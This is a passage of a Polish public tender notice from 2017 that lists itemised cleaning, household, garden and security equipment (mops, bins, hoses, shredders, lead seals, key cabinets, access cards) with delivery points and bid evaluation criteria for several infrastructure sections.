              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />a.	Zamawiający zastrzega możliwość zmiany wysokości zobowiązania wynikającego z oferty Wykonawcy w przypadku zmiany stawki podatku od towarów i usług w roku 2017.
b.	Zamawiający zastrzega sobie możliwość zmniejszenia zakresu przedmiotowego umowy, a co za tym idzie, zmniejszenia zobowiązania wynikającego z niniejszej umowy, przy czym wartość niewykorzystanego zobowiązania nie może być większa niż 30% wartości, określonej w § 6 ust. 1. Umowy
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17/03/2017, godzina: 08:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Drobny sprzęt gospodarczy<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Drążek do prysznica 
Wykonanie:  biały plastik
z możliwością regulacji długości od 70 do 120 cm.
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie  140 szt
- Sekcji Obsługi Infrastruktury Gołdap  10 szt	szt	150
2	Folia lustrzana  samoprzylepna szerokość 1,219 m 
wewnętrzna
typu Silver 20 lub równoważna
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap	mb	50
3	Kosz na śmieci 12 l
stal nierdzewna
kosz na pedał
wewnątrz dodatkowy pojemnik z rączka 
kolor: chrom
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap 	szt	10
4	Kosz na śmieci uchylny PCV 15 l 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie	szt	80
5	Lampa kempingowa
LED minimum 24 diody
źródła zasilania panel solarny, korbka,
zasilanie sieciowe 230V
ładowarka samochodowa w zestawie
Dostawa do magazynu:
- Sekcja Sprzętu Infrastruktury Giżycko  450 szt
- Sekcji Obsługi Infrastruktury Gołdap  50 szt	szt	500
6	Lustro drogowe fi 800mm
akrylowe z kompletem uchwytów
Dostawa do magazynu:
- Sekcja Sprzętu Infrastruktury Giżycko  3 szt
- Sekcji Obsługi Infrastruktury Węgorzewo  2 szt	szt	5
7	Lustro łazienkowe 1000x470x4mm bez oprawy
boki lustra frezowane i szlifowane 
wklejone uchwyty do zawieszenia na ścianie
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  5 szt 
- Sekcji Obsługi Infrastruktury Suwałki  15 szt	szt	20
8	Lustro łazienkowe 400x600mm
boki lustra frezowane i szlifowane 
wklejone uchwyty do zawieszenia na ścianie
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie  30 szt
- Sekcji Obsługi Infrastruktury Suwałki  15 szt	szt	45
9	Lustro wiszące w ramie drewnianej 1750x600mm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap  20 szt
- Sekcji Obsługi Infrastruktury Węgorzewo  100 szt	szt	120
10	Mata gumowa 900x1500x14mm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo 	szt	20
11	Mata podłogowa ochronna 
bez wypustek 
wymiar : 120x90x0,18cm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Węgorzewo	szt	40
12	Miska plastikowa 
okrągła śr. 40 cm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap	szt	30
13	MOP - końcówka 30 cm (sznurkowa) maxi
długość mopa z gwintem min. 34 cm 
gwint standardowy  fi 22mm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie	szt	1000
14	MOP 10l (wiadro mop + wyciskacz + kij teleskopowy + wkład do mopa 30 cm (sznurkowa) maxi
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  200 szt
- Sekcji Obsługi Infrastruktury Bemowo Piskie  500 szt 
- Sekcji Obsługi Infrastruktury Gołdap  50 szt
- Sekcji Obsługi Infrastruktury Węgorzewo  50 szt	szt	800
15	Mop płaski mop 60 cm z kijem
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo 	szt	160
16	Mop płaski zapas
pasujący do pozycji 15
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo	szt.	60
17	Mop sznurkowy 30 cm (sznurkowa) maxi  z trzonkiem fi 22/1300mm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko 	szt.	100
18	Nakładka myjąca na mop płaski 40cm
 Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko 	szt	150
23	Zestaw do sprzątania 
wymiary: wózka około wys.100,5cm szr.40cm dł. 118,5cm
konstrukcja ze stali chromowanej
4x gumowe kółka 
dwuwiadrowy  2x17 l
z wyciskarką metalowe ramie prasy
mopem sznurkowy 
uchwyt na worek 120l 
worki opakowanie 120l; 50 sztuk w komplecie 
 kijem teleskopowym regulacja 80cm do 140cm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  10 szt
- Sekcji Obsługi Infrastruktury Bemowo Piskie  20 szt	kpl.	30
24	Komplet łazienkowy  
Lustro x 2 szt
półka pod lustro x 2 szt
wieszak podwójny x 2 szt
uchwyt WC z klapką (na papier toaletowy) x 2 szt
mydelniczka x 2 szt
szczotka WC z pojemnikiem x 2 szt
kosz na pedał 5 l x 2 szt
kolor: chrom
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	8
25	Szafka z tworzywa na gaśnice
wykonanie: tworzywo sztuczne
z oknem z pleksi
wymiary: wys.650mm, szer. 275mm, głęb. 230mm 
okna: dwa  150x80 mm 
podstawa czarna
pokrywa czerwona
zamek: zaczep
wyposażenie: uchwyt do mocowania gaśnicy
Dostawa do magazynu:
- Sekcja Sprzętu Infrastruktury Giżycko	szt	10
26	Sztuczna trawa 
wymiar: 53 cm x 10 m
grubość:  6mm
gramatura: 1000g/m2
typ runa: sztuczna trawa
kolor: czarny
trudnopalność: Efl
antyelektrostatyczna
antypoślizgowe: ds
przeznaczenie: na zewnątrz i do wewnątrz
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko
/karta produktu przy dostawie/ 	szt	4
27	Szczotka do zamiatania podłóg + kij 
oprawa drewniana 400x55mm
gwint w oprawie
rodzaj włosia: naturalne końskie 
wysokość 100mm
kij drewniany fi 22 gwintowany  o długości  120 cm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  110 szt
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  40 szt
- Sekcji Obsługi Infrastruktury Bemowo Piskie  750 szt
- Sekcji Obsługi Infrastruktury Gołdap  50 szt
- Sekcji Obsługi Infrastruktury Węgorzewo  50 szt 	szt	1000
28	Szczotka do szorowania z kijem
oprawa: drewno 225x68mm
rodzaj surowca: basyna  (ryż) 33mm
kij drewniany gwintowany z drewna bukowego o długości  125 cm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  20 szt
- Sekcji Obsługi Infrastruktury Gołdap  20 szt	szt	40
29	Szczotka do WC z pojemnikiem plastikowym
materiał: polipropylen
kolor: biały
wolnostojący 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie  80 szt
- Sekcji Obsługi Infrastruktury Gołdap  10 szt
- Sekcji Obsługi Infrastruktury Węgorzewo  40 szt	szt	130
30	Szczotka wc plastikowa 
fi 100mm dł.350mm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko	szt	30
31	Szczotka zmiotka plastikowa z szufelką plastikową
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  70 kpl
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  30 kpl
- Sekcji Obsługi Infrastruktury Bemowo Piskie  150 kpl
- Sekcji Obsługi Infrastruktury Gołdap  20 kpl
- Sekcji Obsługi Infrastruktury Węgorzewo  30 kpl	kpl	300
32	Szybkozłączka   do węży ogrodowych 1/2 
przelotowa z fukcją stop
tworzywo ABS
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo 	szt	5
33	Szybkozłączka  do węży ogrodowych 3/4  
przelotowa z fukcją stop
tworzywo ABS
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo	szt	5
34	Ściągaczka do wody z kijem
szerokość robocza: 55cm
szerokość gumowej nakładki: 3cm 
podwójna guma zbierająca
kij teleskopowy 80cm przed rozłożeniem , 140cm po rozłożeniu 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  50 szt
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  10 szt
- Sekcji Obsługi Infrastruktury Bemowo Piskie  20 szt	szt	80
35	Termometr pokojowy 0-40C
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo	szt	20
36	Termometr zaokienny -40/+50C
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo	szt	10
37	Uchwyt na papier toaletowy z klapką
Kolor: chrom 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Węgorzewo	szt	20
38	Wieszak na ręczniki 
trzy haczyki
wykonanie: listwa 130mm
kolor: chrom
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Węgorzewo	szt	10
39	Czterokołowy pojemnik na odpady 1100l 
spełniający normę DIN dla rozładunku grzebieniowego 
wykonanie: materiał odporny na kwasy, mróz i promieniowanie UV
koła: 4x ogumione fi 200mm, 2 z hamulcem
uchwyty boczne wzmocnione stalową rurką
4 bolce pokrywy, pokrywa z uchwytem-listwą na całej szerokości, 2 boczne uchwyty fi 25mm (wymienne)
Kolor: zielony
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie	szt	10
40	Czterokołowy pojemnik na odpady 1100l 
spełniający normę DIN dla rozładunku grzebieniowego 
wykonanie: materiał odporny na kwasy, mróz i promieniowanie UV
koła: 4x ogumione fi 200mm, 2 z hamulcem
uchwyty boczne wzmocnione stalową rurką
4 bolce pokrywy, pokrywa z uchwytem-listwą na całej szerokości, 2 boczne uchwyty fi 25mm (wymienne)
Kolor: żółty
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie	szt	10
41	Czterokołowy pojemnik na odpady 1100l 
spełniający normę DIN dla rozładunku grzebieniowego 
wykonanie: materiał odporny na kwasy, mróz i promieniowanie UV
koła: 4x ogumione fi 200mm, 2 z hamulcem
uchwyty boczne wzmocnione stalową rurką
4 bolce pokrywy, pokrywa z uchwytem-listwą na całej szerokości, 2 boczne uchwyty fi 25mm (wymienne)
Kolor: niebieski
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie	szt	10
42	Wąż do wody elastyczny zbrojony fi   - 50mb
trzy warstwowy, wewnętrzna z czarnego PCV, środkowa oplot krzyżowy z włókna syntetycznego, zewnętrzna z miękkiego PCV w kolorze czarnym, z dwoma pomarańczowymi paskami 
zakres temperatur: - 20 / + 600C  
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko 	szt	3
43	Wąż do wody elastyczny zbrojony fi  - 25mb
trzy warstwowy, wewnętrzna z czarnego PCV, środkowa oplot krzyżowy z włókna syntetycznego, zewnętrzna z miękkiego PCV w kolorze czarnym, z dwoma pomarańczowymi paskami 
zakres temperatur: - 20 / + 600C  
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon  Mrągowo	szt	6
44	Wąż do wody wzmocniony  na wózku  fi  -  25mb
wąż: trzy warstwowy, wewnętrzna z czarnego PCV, środkowa oplot krzyżowy z włókna syntetycznego, zewnętrzna                z miękkiego PCV w kolorze czarnym, z dwoma pomarańczowymi paskami 
zakres temperatur: - 20 / + 600C  
wózek: wykonanie tworzywo sztuczne i metal , w komplecie dwa przyłącza kranowe 3/4 ,1/2, końcówka do podlewania,              3-szybkozłączki, 1 z funkcją  Aqua Stop
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  2 szt
- Sekcji Obsługi Infrastruktury Gołdap  2 szt 	kpl	2
45	Wąż do wody wzmocniony  na  wózku  fi  - 50mb
wąż: trzy warstwowy, wewnętrzna z czarnego PCV, środkowa oplot krzyżowy z włókna syntetycznego, zewnętrzna                z miękkiego PCV w kolorze czarnym, z dwoma pomarańczowymi paskami 
zakres temperatur: - 20 / + 600C  
wózek: wykonanie tworzywo sztuczne i metal , w komplecie dwa przyłącza kranowe 3/4 ,1/2, końcówka do podlewania,              3-szybkozłączki, 1 z funkcją  Aqua Stop
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap	kpl	2
46	Wiadro plastikowe 5 l z pokrywą
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap	szt	20
47	Wiadro plastikowe bez pokrywy 10 l 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie  80 szt
- Sekcji Obsługi Infrastruktury Gołdap  20 szt	szt	100
48	Popielnica stojąca
korpus , noga i podstawa popielnicy wykonana ze stali szlachetnej 18/10 wykończenie mat
wyjmowany wkład popielnicy
wkład wykonany ze stali powleczony lakierem odpornym na wysoką temperaturę
Dostawa do magazynu:
- Sekcja Sprzętu Infrastruktury Giżycko  10 szt
- Sekcji Obsługi Infrastruktury Gołdap  10 szt	szt	20
49	Wycieraczka dywanowa podgumowana 600x400mm
kolor: czarna
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko  160 szt
- Sekcji Obsługi Infrastruktury Giżycko    20 szt
- Sekcji Obsługi Infrastruktury Gołdap     50 szt	szt	230
50	Wycieraczka gumowo-oczkowa 1000 x 1500 mm
(plaster miodu)
kolor: czarna
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  10 szt
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  20 szt
- Sekcji Obsługi Infrastruktury Bemowo Piskie  20 szt
- Sekcji Obsługi Infrastruktury Gołdap  6 szt	szt	56
51	Wycieraczka gumowa z najazdem  800 x1200x14 mm
kolor: czarna
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko  50 szt
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  10 szt	szt	60
52	Wycieraczka  gumowa z najazdem  900x1500x14mm
kolor: czarna
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko  50 szt
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  20 szt 	szt	70
53	Zasłona prysznicowa 1800x1800mm
oczka wzmocnione
- wieszaki do zawieszenia w komplecie
- na dole wszyte obciążenie 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  100 szt
- Sekcji Obsługi Infrastruktury Gołdap  10 szt
- Sekcji Obsługi Infrastruktury Suwałki  30 szt
- Sekcji Obsługi Infrastruktury Węgorzewo  60 szt	szt	200
54	Zegar ścienny wiszący
wykonany z tworzywa sztucznego
średnica -  od 225mm do 350 mm
cyfry standardowe europejskie 
trzy wskazówki, (sekundnik płynny)
baterie zasilające w komplecie
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko  55 kpl
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  5 kpl
- Sekcji Obsługi Infrastruktury Gołdap  10 kpl
- Sekcji Obsługi Infrastruktury Węgorzewo  30 kpl	kpl	100
55	Grabie metalowe 16 zębów z trzonkiem metalowym
stal węglowa
malowane proszkowo
trzonek: ergonomiczny z anty poślizgową nakładką
długość 140cm 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie	szt	5
56	Łopata piaskowa z trzonkiem  metalowym
hartowana
trzon metalowy powlekany tworzywem
wymiary: 1250x230x320mm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie	szt	57
57	Łopata plastikowa do śniegu z trzonkiem drewnianym 
wymiary: 1350x370x450mm
plastik odporny na mróz 
okuta profilem  aluminium 
trzonek fi 38 z plastikową rękojeścią
mocowana śrubami 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie  106 szt
- Sekcji Obsługi Infrastruktury Gołdap  50 szt	szt	156
58	Nożyce  do żywopłotu
długość:  58 cm
mechanizm dźwigniowy wspomagający cięcie 
przełożenie 3,5:1
rączki anty poślizgowe 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  2 szt
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  2 szt	szt	4
59	Sekator ogrodowy duży
ręcznie kuty
średnica cięcia 15 mm
wykończenie teflon
rączki antypoślizgowe 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  5 szt
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  4 szt	szt	9
60	Siekiera ciesielska 
obuch kuty i hartowany
trzonek z włókna szklanego
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  2 szt
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo  2 szt	szt	4
61	Szpadel  prosty z metalowym trzonkiem
głowica stal hartowana
rączka w kształcie litery D z tworzywa 
kąt nachylenia trzonka 260
wymiary: długość 117omm, szerokość 180mm
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie  34 szt
- Sekcji Obsługi Infrastruktury Gołdap  20 szt	szt	54
62	Taczka spawana wzmacniana 
pojemność 85l
wykonana z blachy  1,8mm
koło pełne bez dętkowe 
felga metalowa, na dwóch łożyskach kulkowych 
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko  10 szt
- Sekcji Obsługi Infrastruktury  Gołdap  10 szt	szt	20
63	Toporek (siekierka) 400g
obuch kuty i hartowany
trzonek z włókna szklanego
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Giżycko rejon Mrągowo 	szt	2
64	Wiadro budowlane 10 l
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap	szt	15
65	Trzonek drewniany 
do siekiery 1,5 kg
Dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Bemowo Piskie	szt	20
66	Skrobaczka do szyb samochodowych
z  mosiężnym skrobakiem oraz gumą do sciągania wody 
Dostawa do magazynu:
Służby Czołgowo  Samochodowej  Węgorzewo 	szt	200
67	Skrobaczka do szyb autobusowych
skrobaczka do lodu z piankową rączką i szczotką, długość całkowita min. 750 mm
Dostawa do magazynu:
Służby Czołgowo  Samochodowej  Węgorzewo	szt	20
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39200000-4, 19500000-1,
                    34900000-6,
                    44100000-1,
                    44500000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia uzależniony będzie od treści złożonej oferty (od 14 do 21 dni od dnia podpisania umowy)<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>SPRZĘT GOSPODARCZY<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Odkurzacz z funkcją prania 
Napięcie: 240V
Podciśnienie (mbar) minimum 210/21
Moc turbiny /pompy (W) minimum  1400/40 max 1500/50
Wydatek powietrza (l/s) minimum  70
Zbiornik na wodę czystą i brudną minimum 4/4 
Wydajność spryskiwania minimum  1l/min
Ciśnienie spryskiwania minimum 1 bar
Przechowywanie wyposażenia w urządzeniu 
Waga bez wyposażenia od 7kg do 8,5kg
Dodatkowo w komplecie zestaw 5 worków + filtr
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	2
2	Odkurzacz mieszkaniowy z wyposażeniem 
moc silnika: 1200W, moc max.: 1400W
napięcie: 240V
pojemność worka minimum 10l
moc ssania minimum: 400W, max 500W
Dodatkowo w komplecie zestaw 10 worków + komplet  filtrów
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	4
3	Odkurzacz  przemysłowy dużej mocy z wyposażeniem
praca na sucho i mokro
napięcie : 230V
moc: minimum (W) 3000 max 3700
pojemność zbiornika ( l ): mini.50, max 70
Dodatkowo w komplecie  5 worków 
Waga bez wyposażenia od 20kg do 30kg
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	7
4	Opryskiwacz plecakowy spalinowy z wyposażeniem
pojemność zbiornika z rozpylaną substancją : minimum 14l , max 20l
pojemność skokowa silnika:  minimum 60 cm3, max 70 cm3
maksymalna wydajność turbiny 1300 m3/h2)
ciężar minimum: 12kg , max 15kg
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	2
5	Szczotka do mycia pojazdów
 z włosiem miękkim na kiju aluminiowym rozsuwanym 100  150 cm
zbiornik na szampon/detergent ilość regulowana pokrętłem 
możliwość używania wody w postaci strumienia lub przez szczotkę 
szybkozłącze na wąż ogrodowy 
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	2
6	WAGA ELEKTRONICZNA PLATFORMOWA 800X800MM  300 kg / 0,1 kg 
- obciążenie max 300 kg;
- pomiar masy w systemie 4 czujników
- działka odczytowa d = 0,1 kg;
- platforma stalowa płaska o rozmiarze 800 x 800 mm;
- miernik z wyświetlaczem LCD i odczytem cyfrowym połączony z platformą przewodem o długości minimum 2,5 m;
- zasilanie sieciowe 240V AC 50-60Hz/ 12 V DC+ akumulator w komplecie;
- czas pracy z zasilaniem akumulatorowym minimum 24 h;
- legalizacja handlowa w III klasie dokładności
Dostawa do magazynu:
-  Służby MPS Giżycku	kpl.	1
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39200000-4, 19500000-1,
                    34900000-6,
                    44100000-1,
                    44500000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin realizacji</td><td>30</td></tr><tr><td>Okres gwarancji</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin wykonania zamówienia uzależniony będzie od treści złożonej oferty (od 14 do 21 dni od dnia podpisania umowy)<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>SPRZĘT DO ZABEZPIECZENIA OBIEKTÓW I INFORMACJI<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Niszczarka 
poziom bezpieczeństwa wg. DIN 66399: P-4/T-2/O-1/F-1/E2
przystosowana do niszczenia: zszywek, spinaczy, kart plastikowych, płyt CD, dyskietek
pojemność kosza na ścinki: minimum 30l, maksimum 40l
ilość niszczonych kartek A4/70g : 20 +/- 5
szerokość wejścia 240 mm
funkcja: cofania 
zabezpieczenie przed przegrzaniem 
olej do niszczarki 125 ml w komplecie 
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	80
2	Niszczarka  
poziom bezpieczeństwa wg. DIN 66399: P-5/T-5/E-4/F-2
przystosowana do niszczenia: zszywek, spinaczy, kart plastikowych, 
pojemność kosza na ścinki: minimum 30l, maksimum 40l
ilość niszczonych kartek A4/70g : 10 +/- 2
szerokość wejścia 240 mm
funkcja: cofania 
zabezpieczenie przed przegrzaniem 
olej do niszczarki 125 ml w komplecie 
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	20
3	Zestaw plombowniczy
do plombowania w plastelinie za pomocą referentki
2 aluminiowe kubki
pałąk wykonany z elastycznej linki stalowej
mocowanie w komplecie
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	100
4	Pojemnik na klucze
z możliwością plombowania za pomocą referentki
wykonanie: metalowy
wymiary: 60x60x110mm +/- 10mm (WxSxG)
kolor: jasnoszary, malowanie proszkowe
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	200
5	Szafka na klucze 25 przegródek  z  pojemnikami
wykonanie: blacha minimum 1mm
kolor: jasnoszary, malowanie proszkowe
możliwość zawieszenia na ścianie elementy mocujące w komplecie 
zamykana jednym frontem z zamkiem kluczowym i miejscem do plombowania referentką
w środku 25 przegródek wraz z pojemnikami pojemniki z możliwością plombowania referentką
na drzwiach dodatkowe wieszaki na klucze 
wymiary: 525x425x205mm +/- 10mm (WxSxG)
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	10
6	Depozytor
korpus z blachy drzwi wykonane z blachy minimum 1mm
15 skrytek zamykanych osobno na zamek kluczowy
skrytki ułożone w rzędach pionowych 3x5
przystosowana do powieszenia na ścianie elementy mocowania w komplecie
wymiary: 525x484x205mm +/- 10mm (WxSxG)
kolor: jasnoszary, malowanie proszkowe
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kpl	10
7	Worek ewakuacyjny
kolor: czerwony
przystosowany do przenoszenia na plecach
zaciągany na sznurek możliwość plombowania
ochrona przed uszkodzeniami mechanicznymi i zamoknięciem
pojemność: minimalna 60l maksymalna 70l    
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	10
8	Skrzynia transportowa aluminiowa
z możliwością plombowania
wymiary: 790x400x330mm +/- 10mm
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	10
9	Karty magnetyczne do systemu przepustowego 
charakterystyka karty zbliżeniowej do systemu kontroli dostępu:
rodzaj: Cienka, PVC
standard: Unique EM 125 kHz
posiada wydrukowany numer seryjny
rozmiar: karty kredytowej (Standard ISO)
możliwość nadruku zdjęcia i tekstu przy użyciu dedykowanych 
drukarek PVC
charakterystyka interfejsu EM 125 kHz:
transmisja danych: bezdotykowa
maksymalny zasięg czytnika: 15 cm
częstotliwość pracy: 125 kHz
transfer danych: 2 kbit/s
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	szt	1000
10	Plomba ołowiana 8mm
Dostawa do magazynu:
- Sekcji Sprzętu Infrastruktury Giżycko	kg	5
11	Plomby ołowiane fi 10
średnica 10mm, ołów miękki rafinowany, otwór w kształcie litery X
Dostawa do magazynu:
Inż.-Sap w Orzyszu	kg	17
12	Drut do plombowania
drut o średnicy 0,6m, średnica oplotu 0,3mm, oplot stalowy, w odcinkach 300 mm
Dostawa do magazynu:
Inż.-Sap w Orzyszu	kg	10
13	Plomby ołowiane fi 8mm
Dostawa do magazynu:
- SUiE w Orzyszu	kg	135
